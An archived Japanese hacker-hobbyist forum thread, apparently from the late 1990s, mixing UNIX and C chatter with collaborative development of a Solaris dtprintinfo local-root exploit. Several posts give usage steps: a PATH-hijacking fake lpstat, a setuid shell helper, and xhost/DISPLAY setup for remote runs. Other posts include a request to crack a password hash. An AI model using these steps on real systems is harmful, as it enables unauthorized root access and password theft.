| 【メッセージ】 バイナリの方でも駄目でした。 で、バイナリの方を実行した時のコアを送りました。 なぜかrootで実行しないとcoreを吐かないので、rootの時のcoreです。 あーそうだ、大事な事を言い忘れていたのですが、私のsolarisはFree版です。 ちゅうか、もしかしてbugtraq進出ですか?! そういえば、solaris7ネタはあまり見てないですよ! うーん、すごい... |
| 【名 前】UNYUN 【タイトル】Sparc 05/04 23:22 |
unewn4th@usa.net |
| 【メッセージ】 せっかく集めたんですけど、たった8byteのコードだけ だったんで、えらくアッサリ片づきました。 なんだったんだろ... ちゅことで、Sparcもrootになれました。 わーい。 ちゅうか... ホント、何やってんだか... @Rorrimさん >「Microsoft、SEでお願いします」って言いました。(笑) いいね、それ。 でも、Shadow Penguin Securityでお願いしますとか 言って、領収書送ってこないでねー。 コレ、今度、研究室で買わす予定です。わははは。 @Hariruさん メル、確認しました。 どうもありがとうございます。 あんなカンジでオッケーっす。 今日か明日にはアップしますんで、今後もよろしくー。 |
| 【名 前】Hariru 【タイトル】UNIX基礎講座 05/04 19:06 |
hariru@eastmail.com |
| 【メッセージ】 またしばらくの間、棺桶(笑)の中に入りにいきますので、 とりあえず今までできたところまでの 「UNIX基礎講座」をメールで送っておきますね。>UNYUNさん いまさらながら思うのですが、 学生時代のような時間と環境がなくなったのはほんと痛いです。 でも、研修で話を聞いているだけでお金もらっているんですから、 ありがち悪い環境でもないのかな。 |
| 【名 前】Rorrim 【タイトル】うさばらしにお買い物 05/04 16:53 |
49hack@usa.net |
| 【メッセージ】 憂さ晴らしに買い物に行ってきました。 前にちょっと話題になった 「クラッキング対策ファイナルガイド」(翔泳社)を買いました。 買うときに、「領収書は?」って聞かれたんで 「Microsoft、SEでお願いします」って言いました。(笑) あとゲーセン行ってMeatMania4thで遊んできました。 Tranceが難しかったです。 なんだか小学生の作文みたいな、軽目の話題を振ってみたりする。 |
| 【名 前】名無 【タイトル】感動 05/03 02:20 |
|
| 【メッセージ】 難しい事をさらっと言うUNYUNさんすごいっす。 |
| 【名 前】UNYUN 【タイトル】SPARC資料 05/02 05:15 |
unewn4th@usa.net |
| 【メッセージ】 海外サイトを徘徊して、厚さ4cmほど資料を仕入れました(笑) あるもんですね。外人パワーはすごい... これで、ばっちしです。分かるかどうかは別にして(笑) ちゅか、こんなんやってないで、カーネルやらんと... っていうより、**書かんと... |
| 【名 前】UNYUN 【タイトル】>Hariruさん、KinZoさん 05/02 04:46 |
unewn4th@usa.net |
| 【メッセージ】 スタックに積む文字列の長さの関係上、exploitコード中の各種定数は、OSの言語にも 依存するかもしれません。 一応、私が確認したのも、2つとも日本語版ですし... #define STARTADR 621 の値を少しづつ小さくする とイケルかもしれませんが... ターゲットバッファからretアドレスまでには、それなりに距離があるんですけど、 ターゲットバッファの上側にローカルバッファがたくさん宣言されてるようで、 関数から復帰するときには、そこに書いたヤツは内部処理で書きかえられてしまう ようなんです。おまけに、ターゲットバッファはものすごーく狭いんで、とても exploitコードを埋める余裕はないです。 だから、普通はretアドレスより下にexploitとretアドレス、NOPを置くんですけど、 今回はretアドレスより上に置いてます。引数にポインタを渡してるフシがあって、 そのバッファが結構近いですので、あんまり上にコードとかを載せると、関数 の内部処理で落ちてしまうようで... どうしても、exploitに使えるバッファがすごく 狭くなります。 おまけに、setuidする前に引数処理で落ちるんで、uidを0にする コードを埋めんといかんし、そのシステムコールはNULLだらけだから、NULL 消しやってるとコードは更に増えるし... LINUXとかみたいに、ターゲットのソースがあると、すごく助かるんですけど、 うーん、全部推測でやってるんで、原因特定がむずいです。 なんにしろ、もうすこ厳密に調べてパラメータに余裕を持たせて みます。 あと、dtcm_convertって、2.5の時も別の問題があったみたいですね。 coreが出ないんでしんどいですけど、こっちの方はターゲットバッファ からretアドレスまでの距離がかなりあります。きっと流せる隙間も たくさんあるはずだと... こっちもたぶんsetuidする前に落ちてます。 |
| 【名 前】KinZo 【タイトル】Re:(1)ex_dtprintinfo.c 05/02 03:16 |
kinzo@mcn.ne.jp |
| 【メッセージ】 はじめまして。 今までROMばかりでしたが... ex_dtprintinfo.c ですが、Solaris7 for x86 日本語版で実行したところ、 ウインドウが一瞬開いて、そのあと#プロンプトが出ました。 バイナリも同じでした。 |
| 【名 前】Hariru 【タイトル】ex_dtprintinfo.c 05/02 01:54 |
hariru@eastmail.com |
| 【メッセージ】 え〜と、GWはSolaris7を動かせますので試してみました。 まずはex_dtprintinfo.cの結果からいいますと、 reverseさんも言われたとおりSegmentation Faultと出てダメでした。 それからex_dtprintinfo86ですが、 やはりこちらもSegmentation Faultとでて同じになってしまいました。 まあ当然といえば当然のような気もしましたが。 続いてgdbを使ってですが、 これはまだgdbをとってきていないので結果なしです。 そういわけで今のところわかっているのは、 私のSolaris7ではうまくいかないということです。 それからアセンブラのことは、私のほうが教えてほしいぐらいなので 知っている本はありませんよ。 |
| 【名 前】UNYUN 【タイトル】re:(2)ちょっと 05/01 23:26 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/test.tar.gz |
| 【メッセージ】 あ、もしバイナリがアレで、gdbインストールしてれば、 すんませんが、 gdb --core core で、 (gdb) x/200 $sp やって、その結果教えてもらえないでしょうか? |
| 【名 前】UNYUN 【タイトル】あと 05/01 23:13 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/test.tar.gz |
| 【メッセージ】 sdtcm_convert もsuidなのにオーバーフローしますね。 でも、IntelのSolaris7のsdtcm_convert、死んでもコア吐かない んです... あぁ、これじゃスタックの中確認しにくい から攻撃プログラム作るのしんどい... SparcのSolaris2.6のはちゃんとコア吐いてくれるんで、そっちから 検討つけてみよう... 家のSolaris2.6も後で試してみよっと。 ちゅっか、なんでそーいうバグ、出すんだろ... |
| 【名 前】UNYUN 【タイトル】re:(2)ちょっと 05/01 23:05 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/test.tar.gz |
| 【メッセージ】 >早速、試してみました。 >一瞬、PrinterJobがでてSegmentation Faultになりました。 ありゃ? retアドレス、環境によってズレちゃうんですかね。 ウチの家のマシンにSolaris 2.6入れて、その直後に試したら ちゃんとrootになれたんですけど... 一応、Solaris7, 2.6のIntel版2台で確認しました。 うーん、coreがあれば分かるんですけど、core送って くださいなんてのは無謀だな〜(笑) すんませんけど、バイナリでやってみてもらえませんか? ガッコで作って、家にもって帰ってrootになったヤツです。 http://www.fortunecity.com/skyscraper/byte/551/tools/test.tar.gz ヘンなのは入ってませんので(笑)、お願いしますです。 あと、Sparc版も作ってるんですが、exploitの機械語コード の制作に苦戦中です。setuid(0)した後、任意の実行ファイル を実行するってもんなんですけど... x86とかも、NULL対策にプログラム自己書き換えとかせな ダメだったんで、Sparc対応は結構しんどいっす。 |
| 【名 前】reverse 【タイトル】re:(1)ちょっと 05/01 22:45 |
esrever@usa.net |
| 【メッセージ】 早速、試してみました。 一瞬、PrinterJobがでてSegmentation Faultになりました。 環境:Solaris 2.6 4intel +MU2 #solaris7は相性問題の関係でインストール不可。キィー、悔しい! |
| 【名 前】UNYUN 【タイトル】うはははは 05/01 14:20 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/ex_dtprintinfo.c |
| 【メッセージ】 おや、Rorrimさん。 Solaris消しちゃったんですかー。ありゃ... ウチの大学もSparcのSolarisならゴロゴロしてるんですけどね。 Intelのは1台しかないです... それはさておき、四苦八苦さん来てるんですか? なんか書いてくださいよー >四苦八苦さん |
| 【名 前】Rorrim 【タイトル】re:(1)ちょっと 05/01 14:09 |
49hack@usa.net |
| 【メッセージ】 うにゃ〜、UNIXはAIX一本に絞ったから Solaris7は消しちゃったよ〜。 お役に立てそうにありません。 >Hariruさん おひさ〜、四苦八苦も寮に入って「ネットできね〜」って 悩んでましたよ、某T芝って会社ですけど...(笑) 昨日四苦八苦が遊びに来て暫くこっちに泊まり込んでます。 アセンブラのプログラムやらされてます。 |
| 【名 前】UNYUN 【タイトル】>Hariruさん 05/01 13:46 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/ex_dtprintinfo.c |
| 【メッセージ】 おひさですね。 しかし、部屋にパソコン持ち込めないんは、イタイですね... ネットもできんとは、うーん、ご愁傷様です... UNIXがないと、生活困りますよねー。ほんと。 講座の方は、手が空いててUNIX使える時にでもお願いします。 私は、前のメインマシンだったO2(IRIX)を後輩に渡して、 今年度からメインがUltraのSUNになりましたです。 慣れ親しんだMIPS & IRIXよ、さようなら。 いやー、しかしSPARC分からん...ちゅうかロクに読めない...(泣) SPARCのアセンブラ関連のいい本知りませんか? |
| 【名 前】UNYUN 【タイトル】ちょっと 05/01 12:54 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/tools/ex_dtprintinfo.c |
| 【メッセージ】 Solaris7 or 2.6 for Intel持ってる方いたら、ちょっと試して もらえませんか? http://www.fortunecity.com/skyscraper/byte/551/tools/ex_dtprintinfo.c [手順1] プリンタが設定されていれば、そのまま手順2へ % pathをカレントディレクトリ最優先で通す % cat > lpstat echo "system for lpprn: server" ^D % chmod 755 lpstat [手順2] % cat > aa.c main(){ setuid(0); setgid(0); system("/bin/sh"); } ^D % gcc aa.c -o /tmp/aa % gcc ex_dtprintinfo.c % a.out リモートでやる場合は、先にディスプレイの設定をしてください。 [例] 100.100.100.100 ターゲットのIP 200.200.200.200 あなたのIP yourhost % su yourhost # /usr/openwin/bin/xhost +100.100.100.100 yourhost # telnet 100.100.100.100 : : target % setenv DISPLAY 200.200.200.200:0.0 (shなら DISPLAY=200.200.200.200:0.0;export DISPLAY) あとは、ex_dtprintinfo.cを送って上の手順通りに あと、これがうまくいったら、/usr/bin/lpstatを消す or ファイル名変更して、 さっきのa.outを実行してみて下さい。 お願いしますです。 |
| 【名 前】Hariru 【タイトル】お久しぶりです 05/01 10:11 |
hariru@eastmail.com |
| 【メッセージ】 わ〜い、久々のネットだあ。実に一ヶ月ぶり〜 研修のため会社に持ち込んだマシンはネットから隔離されているし、 寮は二人部屋でディスクトップの持ち込みも禁止されてるし、 ノートがあったとしても(ないけど)寮の電話回線は止められているわで、 やりたいこともできない状態です。 こんな状態ですから、「UNIX基礎講座」の方は4月以降 まったく進んでいません。すみませんです。 こうなったら、この前入った初任給でノートを買って、 寮で講座打ちながら携帯とつなぐかあ。それとも公衆電話で。 なんかむなしい気もするけど。。。(泣) |
| 【名 前】 【タイトル】re:(1)はじめまして 04/30 16:03 |
|
| 【メッセージ】 ども、ロコさん そのサーバのアドレスを教えてください。 ちゃんと外部から入れるようにして。笑い |
| 【名 前】ロコ 【タイトル】はじめまして 04/29 07:29 |
takuou@anet.ne.jp |
| 【メッセージ】 はじめまして。ロコともうします。今まで見てばかりでしたがこれから色々教えてもらいたいのでみなさんよろしくお願いします。 早速なんですが、大学の研究室のセキュリティ担当になったのですが、ツールでサーバにポートスキャンして返ってきた返事とサービスに食い違いがあったのですがこういうことはあるのですか? また、何でそうなるのですか? 僕のイメージとして、ポートがあいててデーモンが動いていたらサービスが行われるものと思っています。このイメージは間違ったいますか? あと、このサーバにテルネットでdaytimeにアクセスしても返事が返ってこなかったのです。サーバの設定はこれはサービスするようになっているのにです。 どうかみなさん助言を下さい! お願いします。 |
| 【名 前】 【タイトル】re:(1)mail 04/26 16:58 |
|
| 【メッセージ】 >現在専用線を使ってメールサーバを構築中なのですが 管理人は(root)で >他人のメールを覗き見ることは可能なんでしょうか? >どうもユーザの一人がとんでもないサイズのファイル付きメール(だと思う)をを受信している >みたいなんです。 覗き見できるけど、rootはそんなことしちゃいかんでしょう。 メールのサイズを制限したかったら、sendmail.cfに、 O MaxMessageSize=131072 とか書けば128KBが最大になります。WIDE CFだったら、 MAX_MSG_SIZE='131072' とかやります。 |
| 【名 前】とおりすがり 【タイトル】わかっちょります 04/24 14:57 |
|
| 【メッセージ】 ただOyaji-Pさんの書き方がよくわからなかっただけです。 うにゅんさん等に書いたのではありませぬ |
| 【名 前】UNYUN 【タイトル】れれれ 04/24 12:13 |
unewn4th@usa.net |
| 【メッセージ】 さっき、なんとなくWinのTinyFTPd使ってたんですけど、 RETRでremote overflowさせられるみたいで。 ログファイルにも残らんようだし。なんだかなぁ... @Dylan!!さん TurboLinuxは、インストールや設定が楽なんで、初めてやる 場合はいいんじゃないでしょうか。 @とおりすがりさん @Oyaji-Pさん あの問題は、何であれで落ちるんかっていうことで、 ちゃんと動かすにはどうすればいいんかっていうことじゃ ないんですけどね... @i love unixさん rootなら、誰にでもsuもできるし、catとかでも読めますよ。 |
| 【名 前】とおりすがり 【タイトル】re:(2)よして。 04/24 09:34 |
|
| 【メッセージ】 なんでせっかくmalloc使ってんのに定数いれてるんでしょうか? 確保した領域にstrcpyするんなら最初からstrlenつかえばいいのでは? (あと細かいけどstring.hが・・・) char *a; a=(char*)malloc(strlen(str)+1); if(a!=NULL) strcpy(a,str); ていうかただの通りすがりです、ゴメンナサイ :-) |
| 【名 前】Oyaji-P 【タイトル】ん〜 04/23 18:07 |
h-takeyama@fjb.co.jphttp://www.fjb.co.jp/ |
| 【メッセージ】 そして、意味の無い削除 (オプ |
| 【名 前】i love unix 【タイトル】mail 04/23 14:10 |
|
| 【メッセージ】 現在専用線を使ってメールサーバを構築中なのですが 管理人は(root)で 他人のメールを覗き見ることは可能なんでしょうか? どうもユーザの一人がとんでもないサイズのファイル付きメール(だと思う)をを受信しているみたい なんです。しかもこの人設定したpasswdをかってに変えちゃって何ともならないんです。 (suしてみてやろうと思ったのに・・・) 何とかこの人のメール(中身の文やファイル)を覗き見ることはできないんでしょうか? 初心者的な質問なのですが教えてほしいです。 |
| 【名 前】oyaji-P 【タイトル】で、 04/22 17:13 |
oyaji@usa.net |
| 【メッセージ】 意味の無いレスか (プ |
| 【名 前】Oyaji-P 【タイトル】ここも 04/22 16:43 |
h-takeyama@fjb.co.jphttp://www.fjb.co.jp/ |
| 【メッセージ】 アクセスログ取ってるのかね。 |
| 【名 前】Dylan!! 【タイトル】もうすぐ、、、 04/22 15:47 |
|
| 【メッセージ】 DYlan!!です。 やっぱりUNYUNさんが言った通りwinと共存はやめてLinux専用にしようと計画中!。 とりあえず外漬けのHDをノートにつけてから色々やろうと思います。 今のところはフロッピーで動くLinuxで遊ぼうかと(unixマガジン3月号で記事が乗ってた)。 やっぱ最初はTurboLinuxがいいんでしょうか? HD400 メモリ16M cpu486では、なんとか動くと言う程度のような気がするのですが、、、 ペンアカ(略)第5回 だんだんついていくのがつらくなってきた しかし、頭コンパイルとはすごいっすねー。 月1アップについていけるように自習だー(笑)。 |
| 【名 前】UNYUN 【タイトル】re:(1)よして。 04/21 19:41 |
unewn4th@usa.net |
| 【メッセージ】 >どうでしょう? 「どう」って言われても... うーん、コまッタ(笑) っていうか、このプログラム、「意味」がわからんです(笑) |
| 【名 前】Oyaji-P 【タイトル】よして。 04/21 18:37 |
onanie@mail7.dddd.ne.jp |
| 【メッセージ】 #include <stdio.h> #define SIZ 32 main() { char a; a = (char )malloc(SIZ); strcpy(a, "Test String"); free(a); exit(0); } どうでしょう? |
| 【名 前】UNYUN 【タイトル】re:(5)コアダンプ 04/20 01:11 |
unewn4th@usa.net |
| 【メッセージ】 DOSとかそれより前の時代とかって、良かったですねー 私も、かなーり昔の8086(V30ともいう)全盛時代に、DOS上で動く マルチタスクカーネル(モドキ)とか、DOSアプリのタスクチェンジとか イロイロやってたんですけど、特権レベルもクソもないんで、 そのヘンはまったく気にせず作ってました。 おかげでヘボいけど(笑)。 DOSなんて、ソースなかっても何やってるか、だいたい理解できたんですが、 最近のUNIXカーネル(とCPU)はスゴいですね。 マジで、分からんとこいっぱいあります。 とりあえず、解析中。 夢はUNYUX (爆死) |
| 【名 前】Chie 【タイトル】うわ〜、むっちゃ恥ずかしい…。(^^ゞ 04/20 00:52 |
|
| 【メッセージ】 失礼しました。ああいうことですね。 |
| 【名 前】だれだろう 【タイトル】re:(1)PC-9821Xs i08486 DX2 66M 04/19 23:00 |
|
| 【メッセージ】 んーとカルトは TABキーでもどうぞ。 |
| 【名 前】質問君 【タイトル】re:(4)コアダンプ 04/19 22:59 |
|
| 【メッセージ】 どもっす。つーか、実は私(笑)(だれだろう。わらい ちゅーか、おれって初心者だなやっぱり(涙 MS−Cあたりだとそんなことにはならなかったはずなのに・・・ この辺解説してる本とか殆どないんじゃないですか?ひょっとして 私のもってる本には「できる」ってあったので(笑) がんばっておぼえようっと。 |
| 【名 前】UNYUN 【タイトル】PC-9821Xs i08486 DX2 66M 04/19 17:05 |
unewn4th@usa.net |
| 【メッセージ】 @Rorrimさん おぉ、月一ですかー。よろしくお願いしますねー。 @Chieさん カルトはー、えーと... 何とも言えませんです。 @epermさん そういえば、とうとう不正アクセス対策法案が、閣議決定&国会に 提出されたようですね。なんだかなーって法律ですけど(笑) |
| 【名 前】UNYUN 【タイトル】re:(3)コアダンプ 04/19 16:44 |
unewn4th@usa.net |
| 【メッセージ】 >アカデミーでこのあたりにも言及して欲しいです。 この辺は、CPUの保護機構に絡んでて、プロセスのTEXT領域 なんかを書き換えようとすると、CPUはカーネルの例外処理 ルーチンを勝手に起動して、プロセスを強制終了、つまり コアダンプっちゅうことになります。 一応、カーネルの解剖とか、改造とかもやる予定ですんで、 そん時にでも。 |
| 【名 前】質問君 【タイトル】re:(2)コアダンプ 04/19 15:35 |
|
| 【メッセージ】 どもです。 a[]でうまく行きました。 でも10文字分定義で11文字目に書き込むわけでもないのに エラーが起こるなんて不思議(うーむ アカデミーでこのあたりにも言及して欲しいです。 では |
| 【名 前】eperm 【タイトル】現在交戦中 04/19 03:25 |
eperm@usa.net |
| 【メッセージ】 うちの鯖を食い物にしていた奴と出食わしました。 現在交戦中です。 ではでは。 |
| 【名 前】Chie 【タイトル】そう言えば…。 04/19 00:51 |
|
| 【メッセージ】 カルトって引越しされたんでしょうか? こちらのリンクも、旧リンクのようですし…。 |
| 【名 前】Rorrim 【タイトル】アップ、アップ 04/18 22:44 |
49hack@usa.net |
| 【メッセージ】 アカデミーの第5回をアップしました。 Cコンパイラの使えるAIX PowerStation220のディスプレイが 飛んでて使いづらかったんで頭コンパイルで書きました。 もしコンパイルのと通らないプログラムがありましたら 教えてください。 (そうならないように簡単なプログラムしか書いてないけど:笑) 色んな人にお尻を叩かれちゃったんで 今度から月1でちゃんと書く事を誓います! (あ〜ぁ、いっちゃった〜:^^;) |
| 【名 前】UNYUN 【タイトル】れれれ 04/18 04:38 |
unewn4th@usa.net |
| 【メッセージ】 @epermさん 何もできない、えせtelnetd作って入れといてあげましょう(笑) 入ったらすぐ"Cracker? Fuck!!!"とか出て追い出されるの。 そんで「侵入された。どうしてくれるんや!」とか文句言うのもいいかも(笑) >O2のデモに入ってる"Newton model"いいですねぇ。 あははは。あのコンニャクみたいなのね(笑) だいたいヘンなの入れすぎ(笑) あのOutOfBoxは、完全にヤリスギですねー @StLightさん おひさです。 とある外人ハカーが「ふぁっくぢゃ」と言ってたらしいです(笑) HP-UXも「ふぁっく」らしいです。うひー |
| 【名 前】StLight 【タイトル】3ヶ月ぶりかも 04/17 23:45 |
|
| 【メッセージ】 >AIXの話は、やっぱあの人ですか?(笑) ぬ、気になるです。 私も最強にイヤです。30個程Cでぶち抜こうとして もう、ハッキリ言って力任せだった(^^; |
| 【名 前】eperm 【タイトル】ぶちきれた・・・のだ。 04/16 22:53 |
eperm@usa.net |
| 【メッセージ】 久々に遊びに来ました。 以前、うちの鯖をクラックしてた奴がまたアクセスして来て もぉ大激怒です。 とっくの昔に再構築&アクセス制限かけてたので、侵入は成功してないですが。 JPCERTから踏台にされてるって警告のメールは来るし・・・ ^^^^^^^^ (されてたの!いまはされてないの!) また雑用が増える ^^^^^^^^ 新学期であちこち鯖の入れ換えやメールアドレスの発行とか新兵教育とかで でむっちゃいそがしいっつうに。給料くれ。ボランティアでは辛すぎ。 2日寝てないし、自分の研究する時間がないのが痛い。 報復したいのですが、向こうはアイスランドのプロバイダから 来てるので直接攻撃はとてもむずかしい・・・と思う。 #なんか方法あります? 相手のプロバイダに怒りのメールを送ります。ついでに 前回侵入してたときのログもたっぷっり付けて。 こっちが仕掛けたsnifferのログもまるごと。 でも 英語で大丈夫かな? O2のデモに入ってる"Newton model"いいですねぇ。 疲れた頭にぴったりです。 あんな感じでぷるぷるしてみたい。 あぁ ぷるぷる ぷるぷる ぷる・・・ |
| 【名 前】UNYUN 【タイトル】re:(2)コアダンプ 04/16 22:14 |
unewn4th@usa.net |
| 【メッセージ】 >スタックにポインタの分しか積まれないからだと思いますが・・・。 そうですね。 unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } main() { char a="abcdefghijklmn"; char b[]="abcdefghijklmn"; long l; static int init_data=3; static int bss; l=get_sp(); printf("Text Area:%lx, Init_data:%lx BSS:%lx Stack:%lx\na:%lx b:%lx\n",get_sp,&init_data,&bss,l,a,b); } これでだいたいのアドレスを確認できます。 a[]="文字列"だと、文字列の内容自体もスタックなので書き換え OKですが、*a="文字列"だと、内容自体はテキストエリアに 置かれるみたいで、やっぱこれ書き換えるとSegmentation Fault します。 |
| 【名 前】hsj 【タイトル】re:(1)コアダンプ 04/16 20:11 |
hsj@geocities.co.jp |
| 【メッセージ】 こんばんは。 >char *a = "Test strings..."; >*( a + 4 ) = '\0'; こう書いたんだろうと言う前提で・・・。 #このアミューザーのバグには結構やられますね(笑) スタックにポインタの分しか積まれないからだと思いますが・・・。 char a[] = "Test strings..."; *( a + 4 ) = '\0'; これならOKだと思いますが・・・ #コンパイラにもよるかも >事務的なことで忙しいんです(言い訳:^^;) 期待してるんで、がんばって下さい(笑) >お勉強 文字どうり勉強になります。 もっと続くとのことなので、こっちも期待してます。 がんばってくださいね(笑) #しかし、これくらいわかり易い文が書いてみたい・・・。 |
| 【名 前】質問君 【タイトル】コアダンプ 04/16 18:44 |
|
| 【メッセージ】 char a = "Test strings..."; ( a + 4 ) = '\0'; でコアダンプ。 何故でしょうか |
| 【名 前】たーくん 【タイトル】re:(1)はっ? 04/16 13:13 |
taku@fbi.gov |
| 【メッセージ】 >事務的なことで忙しいんです(言い訳:^^;) 言い訳するな!! |
| 【名 前】Rorrim 【タイトル】はっ? 04/16 12:52 |
49hack@usa.net |
| 【メッセージ】 なんか、「呼ばれている」気がしたんで来てみたら...(笑) え〜、第五回でしょ?今書いてるんですね〜 土日で仕上げるから待っててください。(イヤ、お願いします) 最近は、住民票の移動と免許証の書き換えとか 事務的なことで忙しいんです(言い訳:^^;) |
| 【名 前】UNYUN 【タイトル】re:(2)お勉強 04/15 21:37 |
unewn4th@usa.net |
| 【メッセージ】 >slackwareで動きました。includeを多少、変えましたが。 ありゃ。 やっぱ、ターボ君だけじゃダメですね。 色々と確認したいこともあるし、やっぱ私もslackware専用マシンを 一台用意します。 |
| 【名 前】reverse 【タイトル】re:(1)お勉強 04/15 21:20 |
esrever@usa.net |
| 【メッセージ】 slackwareで動きました。includeを多少、変えましたが。 なんか、面白いですね、これ。 全然、分かりやすいですし。 コメントも丁寧に付けてあって、たいへん参考になります。。 私も何かやらねば... |
| 【名 前】UNYUN 【タイトル】re:(1)いつもためになります 04/15 15:16 |
unewn4th@usa.net |
| 【メッセージ】 @Dylan!!さん こんにちわ。 >やっぱFMVをlinux専用にするべきなのかな~. 共存なんてケチくさいこと言わずに、どーんと専用機に しましょう(笑) ウチのパソコンはほとんどUNIX専用マシンです。 ノートもそろそろ... >ところでペンギンアカデミーなかなか第5回がきませんね~ Rorrimさーん(笑) |
| 【名 前】Dylan!! 【タイトル】いつもためになります 04/15 12:48 |
|
| 【メッセージ】 どうも!ちょくちょくここに来て勉強させてもらってます。 パケットネタいいですね~。やっぱプログラムをマスターせねば、、、 最近はsnifferやportscanなんかに興味をもってしまって(あんまりわからんけど、、) クラッキング対策ファイナルガイドを勢いで買ってしまった(金が、、) やっぱLinuxいれるべきかな、、HD400Mでwinと共存はつらいっすね。 外付けのHDにTurboLinuxいれようとしたらSCSI認識できなかったし、、 やっぱFMVをlinux専用にするべきなのかな~. ところでペンギンアカデミーなかなか第5回がきませんね~ 結構楽しみに待っているのですが、、 Rorrimさんはいそがしいひとなのかな~? |
| 【名 前】UNYUN 【タイトル】お勉強 04/14 20:22 |
unewn4th@usa.nethttp://www.fortunecity.com/skyscraper/byte/551/ |
| 【メッセージ】 fortune側で、snifferの原理解説のドキュメントをアップしました。 パケットネタのお勉強テキスト、第2段です。 一応、シリーズとして(笑)続けていく予定なんで、興味のある方はどうぞ。 |
| 【名 前】UNYUN 【タイトル】re:(1)usec 04/14 20:18 |
unewn4th@usa.net |
| 【メッセージ】 あははは。 実は私も気づいたの結構最近だったりして(苦笑) 私もUNIXのプログラミングはまだ慣れてないのに、「UNIXのCなんて 簡単やん」とか言って、本も買わずにいい気になってました(笑) しかし、manで到達できないのは、manに問題があるぞぉ!! っつーことで、この件は忘れましょう(爆) |
| 【名 前】インタネト 【タイトル】usec 04/14 19:49 |
|
| 【メッセージ】 ども。 ずーーーっと前にいってたusecの計り方(linux)わかりました。 アホすぎる。うーむ。 やっぱ初心者ですよ、あはは。 まともなLinuxの本が一冊欲しい・・・ |
| 【名 前】kenny32 【タイトル】re:(2)はじめまして 04/14 13:45 |
|
| 【メッセージ】 HIRO_MUさん、レスありがとうございます。 "AUFHEBEN_ICQ"のHIRO_MUさんだったのですね。 ちょくちょく利用させて頂いております。 |
| 【名 前】kenny32 【タイトル】レスありがとうございます。 04/14 13:10 |
|
| 【メッセージ】 前回の書き込みで私のデータの方が少なくて すいませんでした。折角、お答え頂けたのに... 使っているのは、ICQ99aです。 コネクションの方は、私が確認したのはブラウザを立上げていない 状態で、TCPで繋がっていて、ドメイン調べたらワープネット、 ONET、ヴァージンだったり、最後はsomeone.nsv.netとかでした。 その時は、そのコネクションと知り合いだけでした。 OSは95OSR2以降です。 いかがでしょうか? まだまだ、勉強不足なので至らない部分がありますが 宜しくお願いいたします。 |
| 【名 前】B定食 【タイトル】ふむ 04/14 07:34 |
|
| 【メッセージ】 ICQがおかしいなと感じたら、 netstatじゃなくて、sniffer立ち上げたほうがよいですね(笑) 理由はHIRO_MUさんと同じです。 ああ、1つあった。ICQプロテクションは139とは関係ありません(おそらく 単純にリソースの使いすぎとかではないでしょうか? もしくはICQ Plusいれてるとか。 ともかく、人に聞く場合はどんな症状なのかを もっと詳しく書いたほうがイイです。 入れ替わりコネクションがかかるIPってなんでしょう? ICQサーバですか?それ以外ですか? トランスポート層プロトコルはTCP?UDP?ICMP? その時、ネットワークのトラフィックは? と、質問される側が質問してしまうようなのは あんまり良いとは言えないですね。 で、どうですか?>kenny32 |
| 【名 前】HIRO_MU 【タイトル】re:(1)はじめまして 04/14 04:12 |
http://base.oc.to/HIRO_MU/ |
| 【メッセージ】 使っているクライアントのバージョンくらいは書いておかないと レスのしようがないね。(苦笑) それとICQに限って言えば139は全く関係ない。 また、95OSR2以降であればANTINUKEも必要無いし・・・。 うっ、無意味なレスをつけてしまった。(笑) |
| 【名 前】kenny32 【タイトル】はじめまして 04/14 01:22 |
|
| 【メッセージ】 はじめまして。 最近、なんかICQ使ってるとPCがしょっちゅうフリーズするんで、 おかしいなぁと感じて"netstat"でチェックしてたら、なんだか分けわからないドメインが頻繁に入れ替わりで出てくるんです。で、そのうちにフリーズ!これってやられてるんでしょうか? 一応、ANTINUKE,ICQ BOMB PROTECTIONは使ってるんで139は塞いであると思うんですが... どなたか、教えてください。 攻撃される覚えは全然ありません。 |
| 【名 前】UNYUN 【タイトル】re:(3)取りこぼし 04/12 05:11 |
unewn4th@usa.net |
| 【メッセージ】 ちゅうことで、SunOS4.1に対応しました。 http://www.fortunecity.com/skyscraper/byte/551/tools/gdd11.c ソースはLINUX兼で、 SunOS4 : cc gdd11.c -DSUNOS4 LINUX : gcc gdd11.c -DLINUX みたいにコンパイルしてください。 |
| 【名 前】ヌル 【タイトル】お願いします!! 04/12 01:34 |
|
| 【メッセージ】 初投稿でこんな内容申し訳ないのですが、 「OuohSDBLVlzLM」を解いてくださいませ!!お願いします!! Johnで何回も違う辞書でやってみたのですが、全く解けませんでした!! |
| 【名 前】UNYUN 【タイトル】re:(1)これ。 04/11 20:56 |
unewn4th@usa.net |
| 【メッセージ】 AIXの話は、やっぱあの人ですか?(笑) >んで、Infomationのページに私の顔写真入りでプロフ書いてますので >あれそのまま載せてください。 あいな。 しかし、あの顔写真、めちゃオトコマエじゃないっすかー あの目なら、どんな女でも簡単にハクできそう。いいなー(笑) |
| 【名 前】UNYUN 【タイトル】re:(1)UNYUN 氏に一つ質問 04/11 20:42 |
unewn4th@usa.net |
| 【メッセージ】 >4/2から有料になったと聞いたもので... それって、popじゃないですか? webメールは普通に使えますよ。 |
| 【名 前】RZ 【タイトル】これ。 04/11 13:34 |
defcon0@ugtop.comhttp://www.ugtop.com/defcon0/index.htm |
| 【メッセージ】 ども、RZです。 うちのページちょっと更新しました。 んで、Infomationのページに私の顔写真入りでプロフ書いてますので あれそのまま載せてください。 あ、最後のメールに関する記述は切ってくだされ。 それからスキャンの方はまだかかりそうです。 それでは。 |
| 【名 前】ps 【タイトル】UNYUN 氏に一つ質問 04/11 06:48 |
|
| 【メッセージ】 usa.netのアドレスまだ転送できますか? 4/2から有料になったと聞いたもので... |
| 【名 前】UNYUN 【タイトル】re:(2)取りこぼし 04/09 17:34 |
unewn4th@usa.net |
| 【メッセージ】 >とりあえずSunOS4.1.xに対応してくれればよいっす(笑) SunOS4.1っすか(笑) 了解です。ボロボロのSUNで作りますわぁ。 あぁ、SUN VIEWの巻貝マークのターミナルアイコンがなつかしい(笑) >あ、例の件はもーーーーうちょっと待ってくださいね すんませんねぇ〜 |
| 【名 前】麦茶 【タイトル】re:(1)取りこぼし 04/09 14:35 |
|
